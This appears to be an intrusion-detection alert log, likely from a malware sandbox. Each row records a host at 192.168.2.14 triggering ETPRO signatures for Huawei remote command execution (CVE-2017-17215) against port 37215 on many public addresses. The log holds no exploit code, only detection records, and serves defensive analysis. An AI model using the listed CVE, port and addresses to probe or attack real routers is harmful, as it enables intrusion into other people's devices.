                                            06/14/24-10:44:12.615072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185237215192.168.2.1441.41.225.166
                                            06/14/24-10:44:18.763524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754237215192.168.2.14197.186.14.238
                                            06/14/24-10:44:12.614330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914837215192.168.2.1441.56.20.119
                                            06/14/24-10:43:43.942448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308437215192.168.2.14197.14.204.59
                                            06/14/24-10:43:58.289123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5900837215192.168.2.14197.249.20.31
                                            06/14/24-10:43:36.700032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702037215192.168.2.14156.41.125.115
                                            06/14/24-10:44:00.343416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213837215192.168.2.1441.35.166.131
                                            06/14/24-10:43:58.295553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283437215192.168.2.14197.121.199.182
                                            06/14/24-10:43:34.663711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386037215192.168.2.1441.117.177.184
                                            06/14/24-10:43:48.031658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851837215192.168.2.1441.40.114.191
                                            06/14/24-10:44:18.761711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059837215192.168.2.14197.167.103.202
                                            06/14/24-10:44:12.616026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476437215192.168.2.14197.3.214.197
                                            06/14/24-10:44:22.877543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784437215192.168.2.1441.253.171.24
                                            06/14/24-10:43:37.762600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687037215192.168.2.14156.17.199.69
                                            06/14/24-10:44:22.858707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.14197.7.105.48
                                            06/14/24-10:43:56.245520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4496237215192.168.2.1441.57.225.90
                                            06/14/24-10:44:10.580628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315837215192.168.2.14156.251.60.242
                                            06/14/24-10:44:14.686757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905437215192.168.2.14197.242.110.18
                                            06/14/24-10:43:43.940933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319437215192.168.2.14197.48.101.211
                                            06/14/24-10:43:48.034018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566837215192.168.2.1441.97.135.205
                                            06/14/24-10:44:20.828948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713237215192.168.2.14197.127.47.225
                                            06/14/24-10:44:24.914437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3502237215192.168.2.14197.64.43.27
                                            06/14/24-10:44:35.183114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028637215192.168.2.14156.230.23.73
                                            06/14/24-10:44:08.520498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660637215192.168.2.14197.145.98.151
                                            06/14/24-10:43:58.275199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040437215192.168.2.14156.53.31.15
                                            06/14/24-10:44:00.322288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541037215192.168.2.14197.178.174.72
                                            06/14/24-10:43:41.898385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539037215192.168.2.14197.150.139.3
                                            06/14/24-10:44:06.452061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613637215192.168.2.1441.8.161.2
                                            06/14/24-10:44:20.831115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071237215192.168.2.1441.234.227.0
                                            06/14/24-10:44:04.420898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695637215192.168.2.14197.126.229.162
                                            06/14/24-10:44:12.644333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907837215192.168.2.1441.83.4.16
                                            06/14/24-10:44:22.881825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183837215192.168.2.14197.27.72.25
                                            06/14/24-10:43:34.677827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231837215192.168.2.14197.20.145.2
                                            06/14/24-10:43:52.161469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351037215192.168.2.1441.56.111.112
                                            06/14/24-10:43:50.115898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976237215192.168.2.1441.162.237.177
                                            06/14/24-10:44:00.325668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760237215192.168.2.14156.16.203.193
                                            06/14/24-10:44:18.765993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042037215192.168.2.14156.176.31.17
                                            06/14/24-10:43:54.185416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098437215192.168.2.14197.203.60.109
                                            06/14/24-10:44:22.879851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779037215192.168.2.14156.179.68.241
                                            06/14/24-10:44:22.881108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696637215192.168.2.14197.49.14.106
                                            06/14/24-10:44:06.471997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564237215192.168.2.1441.82.230.165
                                            06/14/24-10:43:48.018394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494437215192.168.2.14197.200.64.202
                                            06/14/24-10:43:58.276569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013837215192.168.2.1441.121.104.199
                                            06/14/24-10:43:45.992430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897637215192.168.2.14197.173.129.90
                                            06/14/24-10:43:39.791523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001637215192.168.2.14197.27.182.101
                                            06/14/24-10:44:29.011866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472237215192.168.2.1441.42.201.74
                                            06/14/24-10:44:24.916078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451437215192.168.2.1441.32.53.15
                                            06/14/24-10:43:58.290379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888837215192.168.2.14156.187.123.187
                                            06/14/24-10:44:08.502983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14156.6.204.222
                                            06/14/24-10:44:04.424886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824837215192.168.2.14197.4.170.127
                                            06/14/24-10:44:35.180861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630637215192.168.2.1441.31.244.158
                                            06/14/24-10:44:29.023164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459037215192.168.2.14197.121.221.123
                                            06/14/24-10:43:58.288692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637837215192.168.2.1441.229.0.119
                                            06/14/24-10:43:45.969783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435437215192.168.2.14156.19.142.133
                                            06/14/24-10:44:00.344075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369037215192.168.2.1441.49.69.73
                                            06/14/24-10:44:10.548117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613437215192.168.2.1441.58.226.201
                                            06/14/24-10:44:20.830494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034837215192.168.2.14156.27.8.3
                                            06/14/24-10:44:26.978987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412837215192.168.2.1441.47.229.251
                                            06/14/24-10:43:37.761325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880437215192.168.2.1441.187.128.117
                                            06/14/24-10:43:34.676065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545437215192.168.2.14156.214.90.252
                                            06/14/24-10:43:50.111764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434237215192.168.2.14156.41.150.104
                                            06/14/24-10:43:56.226430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030637215192.168.2.14156.208.21.153
                                            06/14/24-10:44:10.564443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356837215192.168.2.14156.12.229.127
                                            06/14/24-10:44:00.336747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883237215192.168.2.14156.182.43.217
                                            06/14/24-10:43:48.045461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866037215192.168.2.14156.0.144.189
                                            06/14/24-10:44:26.999411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969237215192.168.2.14156.60.104.253
                                            06/14/24-10:43:43.943929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346837215192.168.2.14197.130.70.242
                                            06/14/24-10:44:16.732701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864037215192.168.2.14197.206.203.108
                                            06/14/24-10:44:14.687300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096037215192.168.2.1441.66.48.1
                                            06/14/24-10:44:06.451059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689037215192.168.2.14197.193.38.126
                                            06/14/24-10:44:00.323813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607237215192.168.2.14156.180.44.71
                                            06/14/24-10:44:29.014361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633837215192.168.2.1441.92.222.225
                                            06/14/24-10:44:08.521632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468437215192.168.2.14197.208.197.236
                                            06/14/24-10:43:48.018820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281237215192.168.2.1441.127.239.204
                                            06/14/24-10:44:33.131076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437637215192.168.2.1441.125.1.44
                                            06/14/24-10:43:41.846376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017237215192.168.2.14197.115.206.145
                                            06/14/24-10:44:08.502904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624437215192.168.2.1441.22.37.93
                                            06/14/24-10:44:20.831280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671237215192.168.2.1441.32.235.22
                                            06/14/24-10:44:33.150486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437837215192.168.2.14197.181.25.249
                                            06/14/24-10:44:29.023201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255437215192.168.2.1441.77.142.191
                                            06/14/24-10:44:22.862125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727437215192.168.2.1441.72.57.0
                                            06/14/24-10:44:31.055793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584637215192.168.2.1441.213.57.89
                                            06/14/24-10:43:36.717357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738637215192.168.2.1441.133.233.14
                                            06/14/24-10:44:08.520707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.1441.115.149.214
                                            06/14/24-10:44:02.384174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346637215192.168.2.14156.58.139.222
                                            06/14/24-10:43:45.988874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815437215192.168.2.14197.179.16.208
                                            06/14/24-10:43:34.662165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562437215192.168.2.14156.159.166.61
                                            06/14/24-10:44:12.643167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.14156.240.244.36
                                            06/14/24-10:43:34.660377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856837215192.168.2.1441.245.235.255
                                            06/14/24-10:44:10.564370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819837215192.168.2.14197.150.191.183
                                            06/14/24-10:44:02.365942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499437215192.168.2.14197.49.104.62
                                            06/14/24-10:44:16.717242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183437215192.168.2.14156.131.186.230
                                            06/14/24-10:44:22.861409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403637215192.168.2.14197.38.218.38
                                            06/14/24-10:43:52.149797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5111637215192.168.2.14197.116.112.87
                                            06/14/24-10:43:36.705321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186637215192.168.2.14197.200.116.255
                                            06/14/24-10:44:24.915320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693637215192.168.2.14156.41.61.173
                                            06/14/24-10:43:48.045796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584037215192.168.2.1441.92.59.68
                                            06/14/24-10:44:18.777360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039437215192.168.2.14197.186.155.199
                                            06/14/24-10:44:20.831577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692837215192.168.2.1441.35.67.161
                                            06/14/24-10:44:10.569405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904037215192.168.2.14197.208.185.167
                                            06/14/24-10:44:29.025644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488637215192.168.2.14156.15.56.33
                                            06/14/24-10:44:33.151034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948237215192.168.2.14197.120.186.244
                                            06/14/24-10:44:02.367736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494837215192.168.2.1441.211.1.14
                                            06/14/24-10:44:02.383527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896037215192.168.2.1441.98.153.185
                                            06/14/24-10:44:08.521517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781037215192.168.2.1441.158.154.189
                                            06/14/24-10:44:10.548655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885037215192.168.2.14197.174.44.39
                                            06/14/24-10:44:22.879047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414637215192.168.2.14156.198.200.252
                                            06/14/24-10:44:02.367289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296837215192.168.2.1441.125.21.166
                                            06/14/24-10:44:14.689090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3423437215192.168.2.14156.146.133.254
                                            06/14/24-10:43:54.202086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206037215192.168.2.14197.102.160.32
                                            06/14/24-10:43:48.032721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216237215192.168.2.14156.103.40.158
                                            06/14/24-10:44:08.518560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.14197.47.45.97
                                            06/14/24-10:43:56.228382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463637215192.168.2.1441.53.35.30
                                            06/14/24-10:44:35.182577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150637215192.168.2.14197.55.26.147
                                            06/14/24-10:43:48.027840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952237215192.168.2.1441.28.90.136
                                            06/14/24-10:44:35.181249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626037215192.168.2.14156.53.240.193
                                            06/14/24-10:44:22.880908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501237215192.168.2.14156.0.22.20
                                            06/14/24-10:44:33.151627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878437215192.168.2.14156.102.49.36
                                            06/14/24-10:43:56.243137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188437215192.168.2.14197.18.130.232
                                            06/14/24-10:43:50.071778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861237215192.168.2.14156.90.121.249
                                            06/14/24-10:44:06.471178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553237215192.168.2.1441.157.239.22
                                            06/14/24-10:44:14.668926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672037215192.168.2.14156.128.107.113
                                            06/14/24-10:44:14.669496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853637215192.168.2.1441.135.229.114
                                            06/14/24-10:43:54.185647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456237215192.168.2.14156.61.213.74
                                            06/14/24-10:43:56.229617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989237215192.168.2.14197.172.151.30
                                            06/14/24-10:44:02.369355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804237215192.168.2.1441.187.237.237
                                            06/14/24-10:43:56.253931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096637215192.168.2.14197.5.68.23
                                            06/14/24-10:44:00.341681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352037215192.168.2.14197.243.143.180
                                            06/14/24-10:44:00.340678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436637215192.168.2.14156.105.73.27
                                            06/14/24-10:44:02.364733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334037215192.168.2.14197.124.123.26
                                            06/14/24-10:43:54.201232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689237215192.168.2.14197.139.216.6
                                            06/14/24-10:43:36.724062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578037215192.168.2.14156.117.60.7
                                            06/14/24-10:44:04.408940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014837215192.168.2.1441.102.172.244
                                            06/14/24-10:44:12.613791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837637215192.168.2.14156.82.103.243
                                            06/14/24-10:43:36.726815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400837215192.168.2.14197.254.127.54
                                            06/14/24-10:43:43.969051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953037215192.168.2.14156.236.35.236
                                            06/14/24-10:43:50.072706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446637215192.168.2.14156.219.136.148
                                            06/14/24-10:43:50.070397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677437215192.168.2.14156.7.1.232
                                            06/14/24-10:44:08.517822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425437215192.168.2.14156.179.164.182
                                            06/14/24-10:44:31.055453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848037215192.168.2.14156.238.62.246
                                            06/14/24-10:43:48.021552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881437215192.168.2.1441.111.215.236
                                            06/14/24-10:44:00.324591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674037215192.168.2.14197.202.158.78
                                            06/14/24-10:43:54.186053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240837215192.168.2.14156.29.35.64
                                            06/14/24-10:44:18.761584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852237215192.168.2.14156.154.163.8
                                            06/14/24-10:44:24.943571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540837215192.168.2.14197.205.175.80
                                            06/14/24-10:44:04.410588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538837215192.168.2.14197.145.50.31
                                            06/14/24-10:44:04.423328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817637215192.168.2.14156.192.235.22
                                            06/14/24-10:44:33.131289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779437215192.168.2.1441.251.141.113
                                            06/14/24-10:43:52.161512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603437215192.168.2.1441.72.235.200
                                            06/14/24-10:44:26.978071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610837215192.168.2.1441.99.42.160
                                            06/14/24-10:44:06.453951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374037215192.168.2.14197.249.228.218
                                            06/14/24-10:44:00.325854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489837215192.168.2.14197.90.228.40
                                            06/14/24-10:44:14.671648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322837215192.168.2.14156.124.112.115
                                            06/14/24-10:44:00.324376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453437215192.168.2.14156.244.122.76
                                            06/14/24-10:44:29.025766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530837215192.168.2.1441.191.195.81
                                            06/14/24-10:44:33.135029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868037215192.168.2.1441.229.183.170
                                            06/14/24-10:43:50.074585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334637215192.168.2.14156.14.11.121
                                            06/14/24-10:44:02.365354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019637215192.168.2.14197.93.101.3
                                            06/14/24-10:43:36.702843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530237215192.168.2.14156.249.224.225
                                            06/14/24-10:43:37.761506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433237215192.168.2.14197.224.153.39
                                            06/14/24-10:44:26.985821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809637215192.168.2.14197.148.138.163
                                            06/14/24-10:44:06.451841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233437215192.168.2.1441.172.49.70
                                            06/14/24-10:43:43.970816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518037215192.168.2.14197.217.13.144
                                            06/14/24-10:43:56.225398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110237215192.168.2.14156.131.60.87
                                            06/14/24-10:44:22.879261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5823637215192.168.2.1441.253.137.103
                                            06/14/24-10:43:52.160744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836037215192.168.2.14156.57.244.35
                                            06/14/24-10:44:29.012745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238637215192.168.2.14197.228.91.100
                                            06/14/24-10:43:39.812896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983037215192.168.2.1441.139.209.46
                                            06/14/24-10:43:39.789851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612037215192.168.2.14197.104.114.163
                                            06/14/24-10:44:18.766530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587837215192.168.2.1441.162.37.137
                                            06/14/24-10:44:10.542286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617437215192.168.2.14156.58.152.114
                                            06/14/24-10:43:34.678337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219437215192.168.2.14197.63.157.30
                                            06/14/24-10:44:29.014780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.1441.230.126.222
                                            06/14/24-10:43:58.289025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142237215192.168.2.14197.2.241.120
                                            06/14/24-10:43:54.183285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550637215192.168.2.14197.105.9.77
                                            06/14/24-10:44:14.668440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536637215192.168.2.14156.106.60.222
                                            06/14/24-10:44:35.178948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710637215192.168.2.14197.181.74.123
                                            06/14/24-10:44:20.804668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177837215192.168.2.1441.119.230.45
                                            06/14/24-10:43:50.069044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452437215192.168.2.14156.143.166.23
                                            06/14/24-10:44:04.424695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939437215192.168.2.1441.39.166.126
                                            06/14/24-10:44:26.979505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574637215192.168.2.14156.83.119.46
                                            06/14/24-10:43:54.183084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090837215192.168.2.14197.63.83.241
                                            06/14/24-10:43:37.760781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023237215192.168.2.14156.11.77.17
                                            06/14/24-10:43:56.225534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.14156.46.194.23
                                            06/14/24-10:44:00.340216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078837215192.168.2.1441.165.0.26
                                            06/14/24-10:43:58.295432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881237215192.168.2.14156.112.4.102
                                            06/14/24-10:44:12.625202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537837215192.168.2.14156.151.196.54
                                            06/14/24-10:44:29.024123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4657437215192.168.2.1441.212.75.202
